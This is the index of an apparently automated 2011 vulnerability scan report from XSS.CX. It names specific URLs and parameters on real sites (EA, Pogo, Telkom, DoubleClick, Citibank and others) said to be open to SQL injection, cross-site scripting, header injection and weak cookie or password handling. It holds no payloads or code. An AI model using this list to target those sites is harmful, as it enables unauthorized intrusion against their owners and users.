XSS, Reflected Cross Site Scripting, CWE-79, CAPEC-86, DORK, GHDB, 06252011-01

Report generated by XSS.CX at Sat Jun 25 09:46:18 CDT 2011.

Public Domain Vulnerability Information, Security Articles, Vulnerability Reports, GHDB, DORK Search

XSS Home | XSS Crawler | SQLi Crawler | HTTPi Crawler | FI Crawler |

Loading

1. SQL injection

1.1. http://beta.telkom.co.id/op.php [icid parameter]

1.2. http://googleads.g.doubleclick.net/pagead/ads [bpp parameter]

1.3. http://googleads.g.doubleclick.net/pagead/ads [h parameter]

2. Cross-site scripting (stored)

2.1. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [REST URL parameter 2]

2.2. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [REST URL parameter 2]

3. HTTP header injection

3.1. http://ad.doubleclick.net/dot.gif [REST URL parameter 1]

3.2. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/Y2YJ7A74HNGIZPY5GRC64S/OBXRF4HH6JFXLDDVFSEQTM [REST URL parameter 2]

3.3. http://sales.swsoft.com/buyonline/ [key parameter]

3.4. http://sales.swsoft.com/buyonline/ [name of an arbitrarily supplied request parameter]

3.5. http://sales.swsoft.com/buyonline/ [os parameter]

3.6. http://sales.swsoft.com/buyonline/ [store_id parameter]

3.7. http://sales.swsoft.com/buyonline/ [version parameter]

3.8. http://tos.ea.com/legalapp/WEBPRIVACY/US/en/PC/ [REST URL parameter 3]

4. Cross-site scripting (reflected)

4.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [cid parameter]

4.2. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [id parameter]

4.3. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [name of an arbitrarily supplied request parameter]

4.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [rv parameter]

4.5. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [t parameter]

4.6. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [uid parameter]

4.7. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [c parameter]

4.8. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [c parameter]

4.9. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [forced_click parameter]

4.10. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [forced_click parameter]

4.11. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [m parameter]

4.12. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [m parameter]

4.13. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [mid parameter]

4.14. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [mid parameter]

4.15. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sid parameter]

4.16. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sid parameter]

4.17. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sz parameter]

4.18. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [sz parameter]

4.19. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [tp parameter]

4.20. http://ad.doubleclick.net/adj/N5763.288148.ADRX/B5223690.13 [tp parameter]

4.21. http://ar.voicefive.com/b/rc.pli [func parameter]

4.22. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 1]

4.23. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 1]

4.24. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 1]

4.25. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 2]

4.26. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 2]

4.27. http://beta.telkom.co.id/hubungan-investor/siaran-pers/undangan-acara-investor-company-site-visit-di-manado.html [REST URL parameter 2]

4.28. http://beta.telkom.co.id/info-perusahaan/ [REST URL parameter 1]

4.29. http://beta.telkom.co.id/info-perusahaan/ [REST URL parameter 1]

4.30. http://beta.telkom.co.id/info-perusahaan/ [REST URL parameter 1]

4.31. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 1]

4.32. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 1]

4.33. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 1]

4.34. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 2]

4.35. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 2]

4.36. http://beta.telkom.co.id/pojok-media/artikel-infokom/ [REST URL parameter 2]

4.37. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 1]

4.38. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 1]

4.39. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 1]

4.40. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 2]

4.41. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 2]

4.42. http://beta.telkom.co.id/pojok-media/berita-telkom/ [REST URL parameter 2]

4.43. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 1]

4.44. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 1]

4.45. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 1]

4.46. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 2]

4.47. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 2]

4.48. http://beta.telkom.co.id/pojok-media/siaran-pers/ [REST URL parameter 2]

4.49. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 1]

4.50. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 1]

4.51. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 1]

4.52. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 2]

4.53. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 2]

4.54. http://beta.telkom.co.id/pojok-media/siaran-pers/telkom-meraih-imac-award-sebagai-the-best-provider-and-telecommuncation.html [REST URL parameter 2]

4.55. http://beta.telkom.co.id/products-services/index.html [REST URL parameter 1]

4.56. http://beta.telkom.co.id/products-services/index.html [REST URL parameter 1]

4.57. http://beta.telkom.co.id/products-services/index.html [REST URL parameter 1]

4.58. http://beta.telkom.co.id/produk-layanan/ [REST URL parameter 1]

4.59. http://beta.telkom.co.id/produk-layanan/ [REST URL parameter 1]

4.60. http://beta.telkom.co.id/produk-layanan/ [REST URL parameter 1]

4.61. http://coverage.mqcdn.com/coverage [jsonp parameter]

4.62. http://coverage.mqcdn.com/coverage [name of an arbitrarily supplied request parameter]

4.63. http://display.digitalriver.com/ [aid parameter]

4.64. http://display.digitalriver.com/ [name of an arbitrarily supplied request parameter]

4.65. http://display.digitalriver.com/ [tax parameter]

4.66. http://drh2.img.digitalriver.com/store [CategoryID parameter]

4.67. http://ds.addthis.com/red/psi/sites/www.phuket.com/p.json [callback parameter]

4.68. http://km5002.keymetric.net/KM2.js [hist parameter]

4.69. http://km5002.keymetric.net/KM2.js [lag parameter]

4.70. http://km5002.keymetric.net/KM2.js [las parameter]

4.71. http://km5002.keymetric.net/KM2.js [lc1 parameter]

4.72. http://km5002.keymetric.net/KM2.js [lc2 parameter]

4.73. http://km5002.keymetric.net/KM2.js [lc3 parameter]

4.74. http://km5002.keymetric.net/KM2.js [lc4 parameter]

4.75. http://km5002.keymetric.net/KM2.js [lc5 parameter]

4.76. http://km5002.keymetric.net/KM2.js [lca parameter]

4.77. http://km5002.keymetric.net/KM2.js [lkw parameter]

4.78. http://km5002.keymetric.net/KM2.js [lmt parameter]

4.79. http://km5002.keymetric.net/KM2.js [rho parameter]

4.80. http://km5002.keymetric.net/KM2.js [rqu parameter]

4.81. http://km5002.keymetric.net/KM2.js [vid parameter]

4.82. http://s31.sitemeter.com/js/counter.js [site parameter]

4.83. http://search.asiawebdirect.com/ [checkHotel%5BDestinationID%5D parameter]

4.84. http://store.origin.com/ [name of an arbitrarily supplied request parameter]

4.85. http://store.origin.com/DRHM/store [name of an arbitrarily supplied request parameter]

4.86. http://store.origin.com/servlet/ControllerServlet [name of an arbitrarily supplied request parameter]

4.87. http://store.origin.com/servlet/ControllerServlet [objectID parameter]

4.88. http://store.origin.com/store [name of an arbitrarily supplied request parameter]

4.89. http://store.origin.com/store [name of an arbitrarily supplied request parameter]

4.90. http://store.origin.com/store [objectID parameter]

4.91. http://store.origin.com/store/ea/en_US/DisplayHomeTier3Page/StyleID.1364100/StyleVersion.247 [name of an arbitrarily supplied request parameter]

4.92. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.219720800 [name of an arbitrarily supplied request parameter]

4.93. http://store.origin.com/store/ea/en_US/DisplayProductFinderPage/ThemeID.718200/productID.226783800 [name of an arbitrarily supplied request parameter]

4.94. http://store.origin.com/store/ea/en_US/pd/ThemeID.718200/productID.201797000 [name of an arbitrarily supplied request parameter]

4.95. http://store.origin.com/store/ea/home/ [name of an arbitrarily supplied request parameter]

4.96. http://web-static.ea.com/us/favicon.ico [REST URL parameter 2]

4.97. http://web-static.ea.com/us/portal/css/base/js-dependant/game_gamefeatures.css [REST URL parameter 6]

4.98. http://web-static.ea.com/us/portal/css/base/js-dependant/hideOnLoad.css [REST URL parameter 6]

4.99. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery-facebox.css [REST URL parameter 6]

4.100. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery-ui.css [REST URL parameter 6]

4.101. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery.eventcalendar.css [REST URL parameter 6]

4.102. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery.pagination.css [REST URL parameter 6]

4.103. http://web-static.ea.com/us/portal/css/base/js-dependant/jquery.slider.css [REST URL parameter 6]

4.104. http://web-static.ea.com/us/portal/css/base/reset.css [REST URL parameter 5]

4.105. http://web-static.ea.com/us/portal/css/base/utils.css [REST URL parameter 5]

4.106. http://web-static.ea.com/us/portal/css/ea_global_footer.css [REST URL parameter 4]

4.107. http://web-static.ea.com/us/portal/css/ea_gus.css [REST URL parameter 4]

4.108. http://web-static.ea.com/us/portal/css/gui.css [REST URL parameter 4]

4.109. http://web-static.ea.com/us/portal/css/layout.css [REST URL parameter 4]

4.110. http://web-static.ea.com/us/portal/css/localized.css [REST URL parameter 4]

4.111. http://web-static.ea.com/us/portal/css/typography.css [REST URL parameter 4]

4.112. http://web-static.ea.com/us/portal/images/TrustELogo.jpg [REST URL parameter 4]

4.113. http://web-static.ea.com/us/portal/images/flag_icons/us.gif [REST URL parameter 5]

4.114. http://web-static.ea.com/us/portal/images/icon_downloads.png [REST URL parameter 4]

4.115. http://web-static.ea.com/us/portal/images/icon_music.png [REST URL parameter 4]

4.116. http://web-static.ea.com/us/portal/images/icon_photo.png [REST URL parameter 4]

4.117. http://web-static.ea.com/us/portal/images/icon_video.png [REST URL parameter 4]

4.118. http://web-static.ea.com/us/portal/images/icons/blog-icon.png [REST URL parameter 5]

4.119. http://web-static.ea.com/us/portal/images/icons/forum-icon.png [REST URL parameter 5]

4.120. http://web-static.ea.com/us/portal/images/icons/podcast-icon.png [REST URL parameter 5]

4.121. http://web-static.ea.com/us/portal/images/icons/tips-icon.png [REST URL parameter 5]

4.122. http://web-static.ea.com/us/portal/images/site_logos/battlefield.jpg [REST URL parameter 5]

4.123. http://web-static.ea.com/us/portal/images/site_logos/command_conquer.jpg [REST URL parameter 5]

4.124. http://web-static.ea.com/us/portal/images/site_logos/ea_sports.jpg [REST URL parameter 5]

4.125. http://web-static.ea.com/us/portal/images/site_logos/nfs.jpg [REST URL parameter 5]

4.126. http://web-static.ea.com/us/portal/images/site_logos/pogo.jpg [REST URL parameter 5]

4.127. http://web-static.ea.com/us/portal/images/site_logos/sims.jpg [REST URL parameter 5]

4.128. http://web-static.ea.com/us/portal/js/ea/Framework.js [REST URL parameter 5]

4.129. http://web-static.ea.com/us/portal/js/ea/ShoppingCartService.jQuery.JSON-1.3.min.js [REST URL parameter 5]

4.130. http://web-static.ea.com/us/portal/js/jquery/jquery-1.2.6.min.js [REST URL parameter 5]

4.131. http://web-static.ea.com/us/portal/js/jquery/jquery-1.4.2.min.js [REST URL parameter 5]

4.132. http://web-static.ea.com/us/portal/js/jquery/jquery-easing-1.3.min.js [REST URL parameter 5]

4.133. http://web-static.ea.com/us/portal/js/jquery/jquery-facebox-1.2.min.js [REST URL parameter 5]

4.134. http://web-static.ea.com/us/portal/js/jquery/jquery-ui-personalized-1.5.3.min.js [REST URL parameter 5]

4.135. http://web-static.ea.com/us/portal/js/jquery/jquery.checkbox.js [REST URL parameter 5]

4.136. http://web-static.ea.com/us/portal/js/jquery/jquery.dynamic-drop.js [REST URL parameter 5]

4.137. http://web-static.ea.com/us/portal/js/jquery/jquery.equalizecols.js [REST URL parameter 5]

4.138. http://web-static.ea.com/us/portal/js/jquery/jquery.eventcalendar.min.js [REST URL parameter 5]

4.139. http://web-static.ea.com/us/portal/js/jquery/jquery.labelinput.js [REST URL parameter 5]

4.140. http://web-static.ea.com/us/portal/js/jquery/jquery.pagination.js [REST URL parameter 5]

4.141. http://web-static.ea.com/us/portal/js/jquery/jquery.slider.min.js [REST URL parameter 5]

4.142. http://web-static.ea.com/us/portal/js/jquery/jquery.sortlist.js [REST URL parameter 5]

4.143. http://web-static.ea.com/us/portal/js/jquery/jquery.spotlight.min.js [REST URL parameter 5]

4.144. http://web-static.ea.com/us/portal/js/jquery/jquery.tab.js [REST URL parameter 5]

4.145. http://web-static.ea.com/us/portal/js/jquery/jquery.validate-1.5.min.js [REST URL parameter 5]

4.146. http://web-static.ea.com/us/portal/js/swfobject/swfobject.min.js [REST URL parameter 5]

4.147. http://web.sa.mapquest.com/mobil1/ [tempset parameter]

4.148. http://www.addthis.com/bookmark.php [REST URL parameter 1]

4.149. http://www.addthis.com/bookmark.php [REST URL parameter 1]

4.150. http://www.ea.com/json/user-menu [returnUrl parameter]

4.151. http://www.exxonmobilstations.com/favicon.ico [REST URL parameter 1]

4.152. http://www.exxonmobilstations.com/favicon.ico [name of an arbitrarily supplied request parameter]

4.153. http://www.exxonmobilstations.com/imag/exxonmobil.ico [REST URL parameter 1]

4.154. http://www.exxonmobilstations.com/imag/exxonmobil.ico [REST URL parameter 2]

4.155. http://www.linkedin.com/countserv/count/share [url parameter]

4.156. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [sourceid parameter]

4.157. http://www.pogo.com/login/Scripts/AC_RunActiveContent.js [Referer HTTP header]

4.158. http://www.pogo.com/login/entry.jsp [Referer HTTP header]

4.159. http://www.pogo.com/login/media/Pogo_General_LP_2.swf [Referer HTTP header]

4.160. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp [Referer HTTP header]

4.161. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php [C3UID cookie]

4.162. http://mapquest.com/ [name of an arbitrarily supplied request parameter]

4.163. http://support.ea.com/ [cp_session cookie]

4.164. http://support.ea.com/app/answers/detail/a_id/3628 [cp_session cookie]

4.165. http://support.ea.com/app/answers/detail/a_id/4394 [cp_session cookie]

5. Flash cross-domain policy

5.1. http://a.netmng.com/crossdomain.xml

5.2. http://ad.doubleclick.net/crossdomain.xml

5.3. http://d.adroll.com/crossdomain.xml

5.4. http://d1.openx.org/crossdomain.xml

5.5. http://fls.doubleclick.net/crossdomain.xml

5.6. http://ib.adnxs.com/crossdomain.xml

5.7. http://idcs.interclick.com/crossdomain.xml

5.8. http://m.adnxs.com/crossdomain.xml

5.9. http://rcci.122.2o7.net/crossdomain.xml

5.10. http://segment-pixel.invitemedia.com/crossdomain.xml

5.11. http://swsoft.122.2o7.net/crossdomain.xml

5.12. http://wotifcom.112.2o7.net/crossdomain.xml

5.13. http://googleads.g.doubleclick.net/crossdomain.xml

5.14. http://static.ak.fbcdn.net/crossdomain.xml

5.15. http://www.facebook.com/crossdomain.xml

6. Silverlight cross-domain policy

6.1. http://ad.doubleclick.net/clientaccesspolicy.xml

6.2. http://rcci.122.2o7.net/clientaccesspolicy.xml

6.3. http://swsoft.122.2o7.net/clientaccesspolicy.xml

6.4. http://wotifcom.112.2o7.net/clientaccesspolicy.xml

7. Cleartext submission of password

7.1. http://everquest2.com/free_to_play

7.2. http://www.metlife.com/system/js/webforms/cta/signinmainjs.js

7.3. http://www.telkomsel.com/product/blackberry/550-Paket-BlackBerry-Pilihan.html

7.4. http://www.telkomsel.com/product/blackberry/undefined

8. SSL cookie without secure flag set

9. Session token in URL

9.1. http://bh.contextweb.com/bh/set.aspx

9.2. http://clicktoverify.truste.com/images/pos_btn3.png

9.3. http://clicktoverify.truste.com/images/watch_btn3.png

9.4. http://clicktoverify.truste.com/pvr.php

9.5. http://l.sharethis.com/pview

9.6. http://maps.googleapis.com/maps/api/js/AuthenticationService.Authenticate

9.7. https://softlayer.parallelsmarketplace.com/store/index.php

9.8. https://softlayer.parallelsmarketplace.com/store/index.php

9.9. http://www.facebook.com/extern/login_status.php

10. Password field submitted using GET method

11. Open redirection

12. Cookie scoped to parent domain

12.1. http://api.twitter.com/1/statuses/user_timeline.json

12.2. http://api.twitter.com/1/urls/resolve.json

12.3. http://www.ea.com/dynajs/gus.jsx

12.4. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

12.5. http://a.netmng.com/

12.6. http://ad.doubleclick.net/click

12.7. http://ad.trafficmp.com/a/bpix

12.8. http://ads.lucidmedia.com/clicksense/pixel

12.9. http://ads.pointroll.com/PortalServe/

12.10. http://api.facebook.com/restserver.php

12.11. http://ar.voicefive.com/b/wc_beacon.pli

12.12. http://b.scorecardresearch.com/b

12.13. http://b.scorecardresearch.com/r

12.14. http://b.voicefive.com/b

12.15. http://bh.contextweb.com/bh/rtset

12.16. http://bh.contextweb.com/bh/set.aspx

12.17. http://ce.lijit.com/merge

12.18. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s61328669162467

12.19. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s62922675390727

12.20. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s64462332874536

12.21. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s65247381473891

12.22. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s65559105472639

12.23. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s68422507352661

12.24. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s69942647062707

12.25. http://ib.adnxs.com/seg

12.26. http://id.google.com/verify/EAAAAE9TvTdgyDSoIlnihnR2Ctc.gif

12.27. http://id.google.com/verify/EAAAAFJrXTT71NDnXz7YilamQqs.gif

12.28. http://idcs.interclick.com/Segment.aspx

12.29. http://images.apple.com/global/nav/styles/navigation.css

12.30. http://images.apple.com/ipod/images/gradient_texture20100901.jpg

12.31. http://m.adnxs.com/msftcookiehandler

12.32. http://media.fastclick.net/w/get.media

12.33. http://media.fastclick.net/w/tre

12.34. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3

12.35. http://pixel.quantserve.com/pixel

12.36. http://pixel.rubiconproject.com/tap.php

12.37. http://r.openx.net/set

12.38. http://r.turn.com/r/beacon

12.39. http://r1-ads.ace.advertising.com/site=783617/size=728090/u=2/bnum=93673890/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.gamersdailynews.com%252Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html

12.40. http://segment-pixel.invitemedia.com/pixel

12.41. http://segments.adap.tv/data/

12.42. http://tracking.searchmarketing.com/welcome.asp

12.43. http://www.addthis.com/bookmark.php

12.44. http://www.facebook.com/login.php

12.45. http://www.facebook.com/sharer/sharer.php

12.46. http://www.xobni.com/csscache/1306529290/styles/chalupa.css

12.47. http://www.xobni.com/favicon.ico

12.48. http://www.xobni.com/javascripts/jquery.base64.min.js

12.49. http://www.xobni.com/javascripts/jquery.json-2.2.min.js

12.50. http://www.xobni.com/media/fonts/Chunkfive-webfont.woff

13. Cookie without HttpOnly flag set

13.1. http://beta.telkom.co.id/

13.2. http://listings.mapquest.com/apps/

13.3. http://ro-c.redorbit.com/modules/news/include/secureimage/image.veriword.php

13.4. http://sales.swsoft.com/buyonline/

13.5. https://softlayer.parallelsmarketplace.com/store/index.php

13.6. http://tracking.searchmarketing.com/welcome.asp

13.7. http://tracking.searchmarketing.com/welcome.asp

13.8. http://tracking.searchmarketing.com/welcome.asp

13.9. http://tracking.searchmarketing.com/welcome.asp

13.10. http://tracking.searchmarketing.com/welcome.asp

13.11. http://tracking.searchmarketing.com/welcome.asp

13.12. http://www.citibank.com/us/cards/exmbl/aos.jsp

13.13. http://www.citibank.com/us/cards/exmbl/exmb_personal.jsp

13.14. http://www.ea.com/dynajs/gus.jsx

13.15. http://www.phuket-travel.com/nightlife/fantasea.htm

13.16. http://www.phuket.com/andamanwhitebeach/

13.17. http://www.telkom-indonesia.com/

13.18. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

13.19. http://a.netmng.com/

13.20. http://aboutus.ea.com/

13.21. http://aboutus.ea.com/favicon.ico

13.22. http://ad.doubleclick.net/click

13.23. http://ad.trafficmp.com/a/bpix

13.24. http://ad.yieldmanager.com/pixel

13.25. http://ad.yieldmanager.com/unpixel

13.26. http://ads.lucidmedia.com/clicksense/pixel

13.27. http://ads.pointroll.com/PortalServe/

13.28. http://ar.voicefive.com/b/wc_beacon.pli

13.29. http://b.scorecardresearch.com/b

13.30. http://b.scorecardresearch.com/r

13.31. http://b.voicefive.com/b

13.32. http://bh.contextweb.com/bh/rtset

13.33. http://bh.contextweb.com/bh/set.aspx

13.34. http://ce.lijit.com/merge

13.35. http://d.adroll.com/c/N34ZPOW5TRGMJKDEFHM2G4/Y2YJ7A74HNGIZPY5GRC64S/OBXRF4HH6JFXLDDVFSEQTM

13.36. http://d1.openx.org/afr.php

13.37. http://d1.openx.org/avw.php

13.38. http://d1.openx.org/ck.php

13.39. http://d1.openx.org/lg.php

13.40. http://d1.openx.org/spc.php

13.41. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s61328669162467

13.42. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s62922675390727

13.43. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s64462332874536

13.44. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s65247381473891

13.45. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s65559105472639

13.46. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s68422507352661

13.47. http://eacustomerservice.112.2o7.net/b/ss/eacustomerservice/1/H.5-Pdv-2/s69942647062707

13.48. http://idcs.interclick.com/Segment.aspx

13.49. http://images.apple.com/global/nav/styles/navigation.css

13.50. http://images.apple.com/ipod/images/gradient_texture20100901.jpg

13.51. http://media.fastclick.net/w/get.media

13.52. http://media.fastclick.net/w/tre

13.53. http://network.realmedia.com/RealMedia/ads/adstream_nx.ads/TRACK_Pogo/Retarget_Nonsecure@Bottom3

13.54. http://pixel.quantserve.com/pixel

13.55. http://pixel.rubiconproject.com/tap.php

13.56. http://r.openx.net/set

13.57. http://r.turn.com/r/beacon

13.58. http://r1-ads.ace.advertising.com/site=783617/size=728090/u=2/bnum=93673890/hr=8/hl=1/c=3/scres=5/swh=1920x1200/tile=1/f=0/r=1/optn=1/fv=10/aolexp=1/dref=http%253A%252F%252Fwww.gamersdailynews.com%252Fstory-21533-40-of-Internet-Users-Play-Casual-Games-Says-Spil.html

13.59. http://segment-pixel.invitemedia.com/pixel

13.60. http://segments.adap.tv/data/

13.61. http://statse.webtrendslive.com/dcsjn8qwj10000wge3o74vumw_2o3f/dcs.gif

13.62. http://store.origin.com/DRHM/Storefront/Site/ea/cm/multimedia/foresee/foresee-surveydef.js

13.63. http://store.origin.com/DRHM/Storefront/Site/ea/images/promo/img_arrow.jpg

13.64. http://store.origin.com/store

13.65. http://support.ea.com/

13.66. http://support.ea.com/app/answers/detail/a_id/3628

13.67. http://support.ea.com/app/answers/detail/a_id/4394

13.68. http://thesearchagency.net/pixspike.php

13.69. http://vendorweb.citibank.com/HG

13.70. http://videogamevoters.org/index.php/modal/sc-soon

13.71. http://videogamevoters.org/js/index

13.72. http://videogamevoters.org/page/spud

13.73. http://www.addthis.com/bookmark.php

13.74. http://www.facebook.com/login.php

13.75. http://www.gamersdailynews.com/advertising/administration/www/delivery/ajs.php

13.76. http://www.gamersdailynews.com/advertising/administration/www/delivery/lg.php

13.77. http://www.googleadservices.com/pagead/aclk

13.78. http://www.mapquest.com/_svc/ad/getads

13.79. http://www.mapquest.com/_svc/apixel

13.80. http://www.mapquest.com/_svc/publishing/promo

13.81. http://www.mapquest.com/_svc/searchio

13.82. http://www.mapquest.com/cdn/_uac/adpage.htm

13.83. http://www.mapquest.com/cdn/dotcom3/images/new_purple_button.jpg

13.84. http://www.mapquest.com/icons/stop.png

13.85. http://www.metlife.com/system/css/components_home.css

13.86. http://www.metlife.com/system/css/global.css

13.87. http://www.metlife.com/system/js/vendor/optimost.js

13.88. http://www.onlinecomcast.com/

13.89. http://www.sdc.exxonmobil.com/dcsvakn9g8s9lijdbimge5rk6_8p6d/dcs.gif

14. Password field with autocomplete enabled

14.1. https://customersupport.ea.com/loginapp/cp/login.do

14.2. http://everquest2.com/free_to_play

14.3. https://store.playstation.com/external/index.vm

14.4. http://twitter.com/

14.5. http://twitter.com/

14.6. http://twitter.com/

14.7. http://www.facebook.com/login.php

14.8. http://www.metlife.com/system/js/webforms/cta/signinmainjs.js

14.9. http://www.telkomsel.com/product/blackberry/550-Paket-BlackBerry-Pilihan.html

14.10. http://www.telkomsel.com/product/blackberry/undefined

15. Source code disclosure

15.1. http://article.wn.com/view/2011/02/08/Spil_Games_Selects_Adyens_Internet_Payment_System_for_Global/

15.2. http://cdn.wn.com/or/js/underscore-0.6.0.js

15.3. http://cdn.wn.com/or/js/videoplayer-20110119-2.min.js

15.4. http://download1.parallels.com/PPSMBE/10.0.0/Doc/en-US/online/parallels-panel-smb-administrator-guide/parallels-panel-smb-quick-start/prettify.js

15.5. http://download1.parallels.com/PPSMBE/10.0.0/Doc/en-US/online/parallels-panel-smb-administrator-guide/parallels-panel-smb-user-guide/prettify.js

15.6. http://hotels.asiawebdirect.com/min/f=awdShared/js/prototype.js,awdShared/chromejs/chrome.js,awdShared/js/jquery.js,awdShared/js/jquery-ui.js,awdShared/js/supersearch.js,awdShared/js/destinationnav.js,awdShared/js/redesign_js.js,awdShared/js/template.js,awdShared/js/scriptaculous.js,awdShared/js/effects.js,awdShared/js/builder.js,awdShared/js/livepipe.js,awdShared/js/slider.js,awdShared/js/scrollbar.js,awdShared/js/destinationbox.js,awdShared/js/lightbox.js,awdShared/js/gblcalendar.js,/scripts/placeholders.js&5678

15.7. http://rates.asiawebdirect.com/asahi/frontend.php/rates/dest/en/75/checkIn/14/true/20110624/20110625

15.8. http://rates.asiawebdirect.com/asahi/js/all_scripts_no_prototype2.jsi

16. Referer-dependent response

16.1. http://480-adver-view.c3metrics.com/c3VTabstrct-6-2.php

16.2. http://d1.openx.org/afr.php

16.3. http://use.typekit.com/k/dum7haf-e.css

16.4. http://www.facebook.com/plugins/like.php

16.5. http://www.facebook.com/plugins/likebox.php

16.6. http://www.pogo.com/login/Scripts/AC_RunActiveContent.js

16.7. http://www.pogo.com/login/media/Pogo_General_LP_2.swf

16.8. http://www.pogo.com/pogo-online-games/lp-GeneralPogo-withoutFB.jsp

17. Cross-domain POST

17.1. http://phuket.com/

17.2. http://phuket.com/

17.3. http://www.citibank.com/favicon.ico

17.4. http://www.phuket-travel.com/

17.5. http://www.phuket-travel.com/

17.6. http://www.phuket-travel.com/nightlife/fantasea.htm

17.7. http://www.phuket-travel.com/nightlife/fantasea.htm

17.8. http://www.phuket-travel.com/premium-packages/index.htm

17.9. http://www.phuket.com/andamanwhitebeach/

17.10. http://www.phuket.com/andamanwhitebeach/

17.11. http://www.phuket.com/islands/index.htm

17.12. http://www.phuket.com/islands/index.htm

18. Cross-domain Referer leakage

18.1. http://beta.telkom.co.id/products-services/index.html

18.2. http://beta.telkom.co.id/rss/SimplePie/index.php

18.3. http://beta.telkom.co.id/rss/SimplePie/index.php

18.4. http://clicktoverify.truste.com/pvr.php

18.5. http://cm.g.doubleclick.net/pixel

18.6. http://d1.openx.org/afr.php

18.7. http://d1.openx.org/afr.php

